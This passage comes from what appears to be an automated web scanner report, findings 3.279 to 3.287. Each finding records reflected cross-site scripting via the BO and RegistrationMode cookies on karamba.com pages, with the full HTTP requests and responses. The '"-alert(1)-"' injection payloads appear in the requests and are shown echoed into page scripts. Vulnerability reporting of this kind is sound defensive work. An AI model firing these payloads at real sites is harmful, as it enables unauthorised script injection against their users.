The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e15"-alert(1)-"36510cce250 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMc1e15"-alert(1)-"36510cce250; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc1e15"-alert(1)-"36510cce250; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc1e15"-alert(1)-"36510cce250";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.279. http://www.karamba.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19edf"-alert(1)-"0bece34424 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM19edf"-alert(1)-"0bece34424; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: BO=FM19edf"-alert(1)-"0bece34424; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM19edf"-alert(1)-"0bece34424";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.280. http://www.karamba.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd25a"-alert(1)-"3f178a0f857 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMdd25a"-alert(1)-"3f178a0f857; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdd25a"-alert(1)-"3f178a0f857; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdd25a"-alert(1)-"3f178a0f857";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.281. http://www.karamba.com/Sitemap.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Sitemap.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 197d8"-alert(1)-"9d1dc96b4ef was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM197d8"-alert(1)-"9d1dc96b4ef; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: BO=FM197d8"-alert(1)-"9d1dc96b4ef; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM197d8"-alert(1)-"9d1dc96b4ef";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.282. http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Sitemap.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 866e2"-alert(1)-"16942f1d99f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM866e2"-alert(1)-"16942f1d99f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM866e2"-alert(1)-"16942f1d99f; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM866e2"-alert(1)-"16942f1d99f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.283. http://www.karamba.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bbb0"-alert(1)-"e923809c13 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM2bbb0"-alert(1)-"e923809c13; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: BO=FM2bbb0"-alert(1)-"e923809c13; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2bbb0"-alert(1)-"e923809c13";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.284. http://www.karamba.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e47a2"-alert(1)-"84fe6f787fb was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMe47a2"-alert(1)-"84fe6f787fb; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe47a2"-alert(1)-"84fe6f787fb; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108569


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe47a2"-alert(1)-"84fe6f787fb";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.285. http://www.karamba.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c835b"-alert(1)-"2aef8b92336 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMc835b"-alert(1)-"2aef8b92336; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: BO=FMc835b"-alert(1)-"2aef8b92336; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc835b"-alert(1)-"2aef8b92336";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.286. http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b27e8"-alert(1)-"4b3e1647c57 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMb27e8"-alert(1)-"4b3e1647c57; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb27e8"-alert(1)-"4b3e1647c57; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb27e8"-alert(1)-"4b3e1647c57";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.287. http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /click/Karamba.com/ENG/Home/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa02b"-alert(1)-"205ddca80aa was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMaa02b"-alert(1)-"205ddca80aa; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: BO=FMaa02b"-alert(1)-"205ddca80aa; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44724


